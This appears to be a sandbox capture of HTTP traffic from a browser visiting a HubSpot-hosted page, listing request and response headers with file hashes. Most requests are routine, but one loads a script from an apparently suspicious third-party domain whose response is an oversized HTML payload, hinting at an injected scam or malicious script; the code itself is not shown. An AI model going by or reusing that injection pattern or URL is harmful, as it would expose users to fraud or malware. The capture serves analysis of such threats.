Access-Control-Allow-Origin: http://appnewstv.hs-sites-eu1.com
Last-Modified: Wed, 14 Sep 2022 13:43:27 GMT
CF-Cache-Status: EXPIRED
Accept-Ranges: bytes
Server: cloudflare
CF-RAY: 74acb65dcd4db50f-OSL


--- Additional Info ---
Magic:  ASCII text, with very long lines (546)
Size:   603
Md5:    03d95989ff54ea4abfa917d39db0f991
Sha1:   de66de20c2f7fe335691784dd1e440fbbabaaffb
Sha256: ca941b51a413c5556d7fbb6f3b4b53c507c12d62929b827bdf79b11f2ed86015
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 14 Sep 2022 22:55:49 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.115
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 329
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: ETag, Expires, Content-Length, Cache-Control, Pragma, Content-Type, Alert, Backoff, Last-Modified, Retry-After
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Fri, 25 Mar 2022 17:45:46 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Date: Wed, 14 Sep 2022 22:03:22 GMT
Cache-Control: max-age=3600
Expires: Wed, 14 Sep 2022 22:12:56 GMT
ETag: "1648230346554"
X-Cache: Hit from cloudfront
Via: 1.1 96c778ce6156d12f24b8b6cdaa0cbf66.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: llIRbr4N7gsdQHOZ7LWhgQ0EBBJgZBTAbiFqsFvkCh37KumUWuuD8g==
Age: 3147


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            GET /hubfs/26246913/raw_assets/public/@marketplace/GiantFocal/Hatch_Landing/images/placeholder/image-02.jpg HTTP/1.1 
Host: 26246913.fs1.hubspotusercontent-eu1.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
                                         104.18.34.226
HTTP/1.1 200 OK
Content-Type: image/jpeg
X-HS-Alternate-Content-Type: text/plain
                                        
Date: Wed, 14 Sep 2022 22:55:49 GMT
Content-Length: 208912
Connection: keep-alive
CF-Ray: 74acb65ede73b4f3-OSL
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Age: 44990
Cache-Control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
ETag: "576c8bc261d879e5c7095993fa055911"
Last-Modified: Tue, 13 Sep 2022 13:51:23 GMT
Vary: Accept-Encoding
Via: 1.1 0562d7d213bde9a129ec458c631f9cee.cloudfront.net (CloudFront)
CF-Cache-Status: HIT
Access-Control-Allow-Methods: GET
cache-tag: F-53070748374,FD-53071101644,P-26246913,FLS-ALL
Cf-Bgj: imgq:85,h2pri
Cf-Polished: origSize=208920, status=webp_bigger
Edge-Cache-Tag: F-53070748374,FD-53071101644,P-26246913,FLS-ALL
X-Amz-Cf-Id: mDqyHtOHIzO_qgXXNEX-kYj5maCnodTPy9QRW6ADQTUyaGlKDTWddA==
X-Amz-Cf-Pop: CPH50-C1
x-amz-id-2: TMJLjSWFnpVNG6PErGDCY637rzVM01XSn7rIc6Xcw3emZCzjMmwjLLRpKyERLTnoGPJwt4jJQ7o=
x-amz-meta-cache-tag: F-53070748374,FD-53071101644,P-26246913,FLS-ALL
x-amz-meta-created-unix-time-millis: 1663077082549
x-amz-meta-index-tag: none
x-amz-replication-status: COMPLETED
x-amz-request-id: HW3RG1JQ5A158BX7
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
x-amz-version-id: a0xWrfJ3xzhrq6qQxYKJrHAsTUBXaOuy
X-Cache: RefreshHit from cloudfront
X-HS-CF-Lambda: us-east-1.enforceAclForReads 5
X-HS-CF-Lambda-Enforce: us-east-1.enforceAclForReads 5
X-Robots-Tag: none
Server: cloudflare


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1920x1441, components 3\012- data
Size:   208912
Md5:    bfdc57caf64cf284e867df913fe185da
Sha1:   f7dcd78a87b1e123f9a2f9f55ec1d589c872768b
Sha256: f5e6d7ccd952d26615cf449d6548878465e7297a09175a9054ce2f53ba7d20fc
                                        
                                            GET /cos-i18n/static-1.53/bundles/project.js HTTP/1.1 
Host: static.hsappstatic.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.5.210
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Wed, 14 Sep 2022 22:55:49 GMT
x-amz-replication-status: COMPLETED
last-modified: Tue, 09 Nov 2021 16:12:42 GMT
etag: W/"61ca66de658cab9587e4636894680d5d"
x-amz-server-side-encryption: AES256
x-amz-version-id: P9ES7sOpFzrLl1QoRwjEAy5outPo5_GO
vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 251aba405178d16c89041692c3261a47.cloudfront.net (CloudFront)
x-amz-cf-pop: HEL50-C1
x-amz-cf-id: 34g4n2oNRs8WvBEZGObRDrs6gH3jdmXpAmCs72tfRrSAm6YeuGEZUA==
cf-cache-status: HIT
age: 99597
expires: Thu, 14 Sep 2023 22:55:49 GMT
cache-control: public, max-age=31536000
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=klK25aBMJxRY3sfVQ%2Bmjf4OcV9ZwZmtkPNhDzeFwhMotbD2%2BdJ8bD%2BlMIvlIwK3rPtMlzczimL9dnS5xHBg6wA%2Bq39r0L9nSmZt1XEfbiNqVkCBoujuwkLPZhoKr7JIuJ5m%2Byxa49j4%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 74acb65dccc2b50b-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (1243), with no line terminators
Size:   989
Md5:    262d0296781894e4f487ba4025434d71
Sha1:   4314fdd798320df09b17310ab3d3f4bf655b64e2
Sha256: d0465077b9b6acbc7d32c22ea37c0f1b97abf2da45812ad5137b244b13d073f7
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 14 Sep 2022 22:55:49 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /hub/-1/hub_generated/module_assets/-2712622/1663012019885/module_-2712622_Site_Search_Input.min.css HTTP/1.1 
Host: cdn2.hubspot.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.244.204
HTTP/2 200 OK
content-type: text/css
x-hs-alternate-content-type: text/plain
                                        
date: Wed, 14 Sep 2022 22:55:49 GMT
cf-ray: 74acb65d9b1cb4eb-OSL
access-control-allow-origin: *
age: 183372
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
etag: W/"c708989561e0cdbfcf996d1b7f47482c"
last-modified: Mon, 12 Sep 2022 19:47:00 GMT
vary: Accept-Encoding
cf-cache-status: HIT
access-control-allow-methods: GET
x-amz-cf-pop: IAD55-P1
x-amz-meta-created-unix-time-millis: 1663012019885
x-amz-replication-status: COMPLETED
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4HSqj5RGgtjtT0iDgNk81rIL9blEUeMl97D9uLHWKZBEASOriUn3IlLW0ZSybJL7%2Fn9OsLh96GeL7S5f2B6R6AzMl%2FT5uSP0VNoiQ%2BIUuQaP5bY4ns41xzNhTgZaWvj%2FKVU%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (612), with no line terminators
Size:   1728
Md5:    6714676055c6958051379245dac0b88b
Sha1:   a00414e1213ea21d33ce758b58faee4462921987
Sha256: 1e548e16950fc45b5b0f1bebefa25added53bf557c4a531c4d337d1954e47500
                                        
                                            GET /cms-free-branding-lib/static-1.111/css/hsCmsFreeBranding.css HTTP/1.1 
Host: static.hsappstatic.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
                                         104.17.5.210
HTTP/1.1 301 Moved Permanently
                                        
Date: Wed, 14 Sep 2022 22:55:49 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Wed, 14 Sep 2022 23:55:49 GMT
Location: https://static.hsappstatic.net/cms-free-branding-lib/static-1.111/css/hsCmsFreeBranding.css
Vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cOCDr8gPCIGisVJjOoPAzE9I%2BJD%2BGqUuPBTkXdeiaBPVDHLoGHQt%2FZD%2FHeJEJG0UZu7gx86lTs6P1WgbiqFh62MsyeugNrj0cUDlO4IqEC5Wk8npGrAVdd3Td1%2FyDiJTE3YBdeLTqfA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 74acb6601f31b523-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

                                        
                                            GET /s/roboto/v30/KFOmCnqEu92Fr1Mu4mxK.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://appnewstv.hs-sites-eu1.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.163
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 15744
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 14 Sep 2022 19:34:08 GMT
expires: Thu, 14 Sep 2023 19:34:08 GMT
cache-control: public, max-age=31536000
age: 12101
last-modified: Wed, 11 May 2022 19:24:48 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 15744, version 1.0\012- data
Size:   15744
Md5:    15d9f621c3bd1599f0169dcf0bd5e63e
Sha1:   7ca9c5967f3bb8bffeab24b639b49c1e7d03fa52
Sha256: f6734f8177112c0839b961f96d813fcb189d81b60e96c33278c1983b6f419615
                                        
                                            GET /s/roboto/v30/KFOlCnqEu92Fr1MmWUlfBBc4.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://appnewstv.hs-sites-eu1.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.163
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 15860
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 14 Sep 2022 19:34:08 GMT
expires: Thu, 14 Sep 2023 19:34:08 GMT
cache-control: public, max-age=31536000
age: 12101
last-modified: Wed, 11 May 2022 19:24:42 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 15860, version 1.0\012- data
Size:   15860
Md5:    e9f5aaf547f165386cd313b995dddd8e
Sha1:   acdef5603c2387b0e5bffd744b679a24a8bc1968
Sha256: f5aebdfea35d1e7656ef4acc5db1f243209755ae3300943ef8fc6280f363c860
                                        
                                            GET /cms-free-branding-lib/static-1.111/assets/sprocket_white.svg HTTP/1.1 
Host: static.hsappstatic.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/

                                         
                                         104.17.5.210
HTTP/1.1 301 Moved Permanently
                                        
Date: Wed, 14 Sep 2022 22:55:49 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Wed, 14 Sep 2022 23:55:49 GMT
Location: https://static.hsappstatic.net/cms-free-branding-lib/static-1.111/assets/sprocket_white.svg
Vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z%2BI6pixRlg2dPC0upEciAw81%2FEKSJVMoawBLSRrtp7D%2FZnIOp%2BsoSCetFPU6tT8NnqJUbhEX%2Ba%2FlTGtCY1XGJfe368B7%2FCc1y9DXifNokGhbP5TUo%2B99%2FEshVixTWqKc99szOEdey54%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 74acb6601f35b4f3-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 1903
Cache-Control: 'max-age=158059'
Date: Wed, 14 Sep 2022 22:55:49 GMT
Last-Modified: Wed, 14 Sep 2022 22:24:06 GMT
Server: ECS (ska/F712)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /collectedforms.js HTTP/1.1 
Host: js-eu1.hscollectedforms.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://appnewstv.hs-sites-eu1.com
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.192.122
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Wed, 14 Sep 2022 22:55:49 GMT
access-control-allow-origin: *
access-control-allow-methods: GET
access-control-max-age: 3000
x-amz-replication-status: COMPLETED
last-modified: Tue, 13 Sep 2022 10:41:10 UTC
x-amz-server-side-encryption: AES256
x-amz-version-id: 5afLcxIjU5LfvvyyfvxzjsWXufXHSL1t
etag: W/"7a468b833be86c01bc8dfd455308f792"
vary: Accept-Encoding,Origin,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: RefreshHit from cloudfront
via: 1.1 507b5edb20d0e1a0b73c8687f53defa8.cloudfront.net (CloudFront)
x-amz-cf-pop: FRA6-C1
x-amz-cf-id: 4x15r2QQ2poDiSr4Je3RAtQzJ4Vy6FcuxkEt7Yfp8x95RIzj5HGquw==
cache-control: s-maxage=86400, max-age=0
content-security-policy-report-only: frame-ancestors 'self'; report-uri https://exceptions.hubspot.com/csp/report?resource=collected-forms-embed-js/static-1.292/bundles/project.js&cfRay=74a506dec96b9930-FRA
x-hs-target-asset: collected-forms-embed-js/static-1.292/bundles/project.js
x-hs-cache-status: MISS
cache-tag: staticjsapp-collected-forms-embed-js-web-prod,staticjsapp-prod
cf-cache-status: HIT
age: 80589
server: cloudflare
cf-ray: 74acb6607be71695-ARN
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
Size:   23612
Md5:    0acc6381f56a31e22bfb6ebdc9ea8561
Sha1:   c5aa2bce64d4bb4da9bb4a79f61df3e869af5153
Sha256: 4652ac18f49933b5447fd610e568fc82096bcb6c369e8b0cf5bfebbf0c42d6d7
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "09A40458A8D09F4A00A80574A0D404CB719DBC66709FDFF0E426035C6CEDC4F1"
Last-Modified: Wed, 14 Sep 2022 04:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21533
Expires: Thu, 15 Sep 2022 04:54:42 GMT
Date: Wed, 14 Sep 2022 22:55:49 GMT
Connection: keep-alive

                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: ZV+Dd2Aa+H1V0kCaLEviuA==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

                                         
                                         34.213.140.56
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: 78c4XyF82SycxOQUkeY24DOCplE=

                                        
                                            GET /content-tools-menu/api/v1/tools-menu/has-permission?portalId=26246913&callback=jsonpHandler HTTP/1.1 
Host: app-eu1.hubspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.236.181
HTTP/2 204 No Content
                                        
date: Wed, 14 Sep 2022 22:55:50 GMT
cf-ray: 74acb66289ec9912-ARN
cache-control: max-age=0
strict-transport-security: max-age=31536000; includeSubDomains; preload
cf-cache-status: DYNAMIC
access-control-allow-credentials: true
access-control-allow-methods: GET
report-to: {"group":"default","max_age":86400,"endpoints":[{"url":"https://exceptions.hubspot.com/csp/reports?cfRay=74acb66289ec9912&resource=unknown"}]}
x-hs-worker-debug-mode: false
x-hubspot-correlation-id: 30c1589a-f181-456c-9e41-138f8faba0f6
x-trace: 2BF88E2DE9262F9AA09580B9FFE3C3B2D4EC1A5DBE000000000000000000
set-cookie: __cf_bm=Y2MLbJusjRiDNvEg9VsW_wkB_JF06oyN4bbNsqXI4M4-1663196150-0-AdkPcbbR3iUFEKTkCxoYnO3JY2TQ8+gFF4IFmDC+QD8DAysDP9QU1fnUKGSvVjxpudZ/CMONipTyeQPeYmEr5Mg=; path=/; expires=Wed, 14-Sep-22 23:25:50 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
vary: Accept-Encoding
server: cloudflare
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2

                                        
                                            GET /collected-forms/v1/config/json?portalId=26246913&utk= HTTP/1.1 
Host: forms-eu1.hubspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://appnewstv.hs-sites-eu1.com
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.193.34
HTTP/2 200 OK
content-type: application/json;charset=utf-8
                                        
date: Wed, 14 Sep 2022 22:55:50 GMT
vary: Accept-Encoding
x-hubspot-correlation-id: 652c010d-be0c-413e-a57e-283138638f3d
access-control-allow-credentials: false
access-control-allow-origin: http://appnewstv.hs-sites-eu1.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: *
access-control-max-age: 180
x-robots-tag: none
cf-cache-status: DYNAMIC
set-cookie: __cf_bm=5N14iTYXl4CIaiHdGbPnzh5.FqiwwuOiQYLwD_L5hEg-1663196150-0-ARSwP5JfRvKx5QwxGP66DLQ50tpo/RV1dqoxDZ6L8IdRNcQ509vBOHt8uAIX0EYm6BgWTeAf3StVb/VAur4b/lU=; path=/; expires=Wed, 14-Sep-22 23:25:50 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ol518o0mGZCa6DCcHMUOk%2B6GG%2FJTasmuQLIovPttgT5Q4tBAftR1D50mTtIGvjWLM5r2m7wrsptUIu6g1goBJLkBqzIZ2apqYCvFGwreZ%2BBE9JT%2FQyOQ3XVYrWmTrth2hpIl%2B2KheA%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 74acb661594a95ee-ARN
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   8946
Md5:    14e19cde0b5c9bd481e6bd7e09d4fc18
Sha1:   4d60fe4a88ad34edfe6e6e204ec6c794206d5d26
Sha256: d9d3fedbefe32d5b4f2463de52ba21d58b78bcced538632b870b6cf9ac08876e
                                        
                                            GET /?api=1&lan=twthk&ht=2&counter0=josvip222 HTTP/1.1 
Host: feliznewstv.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         147.182.144.225
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Wed, 14 Sep 2022 22:55:49 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=s2pfvjs789l0b729lp8al927tb; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (63717), with CRLF line terminators
Size:   512224
Md5:    9bba01d1d9085b86dc859903c9996c66
Sha1:   5ee01822118fcbed4f406e2273b10d1d607046ef
Sha256: bac95180b9d023e31413d3c4fe1722de075dcbd9c063d2e9a6f35eadce592b06
                                        
                                            GET /cms-free-branding-lib/static-1.111/js/index.js HTTP/1.1 
Host: static.hsappstatic.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.17.5.210
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Wed, 14 Sep 2022 22:55:49 GMT
x-amz-replication-status: COMPLETED
last-modified: Tue, 12 Jul 2022 20:24:02 GMT
x-amz-server-side-encryption: AES256
x-amz-version-id: UeMu8WOMDUthADLLgqZZZU3H9mISgOsX
etag: W/"29a15a515ef5e383fba2c6d65b1de499"
vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: RefreshHit from cloudfront
via: 1.1 60d22b5ab79521d827fcdd546c7710d4.cloudfront.net (CloudFront)
x-amz-cf-pop: ARN54-C1
x-amz-cf-id: -KuTJcFYSjo9F4GglqsT_-vXHaNSY_Z_DAQD2EJCoeEMmw1nPJ3ipg==
cf-cache-status: HIT
age: 1470791
expires: Thu, 14 Sep 2023 22:55:49 GMT
cache-control: public, max-age=31536000
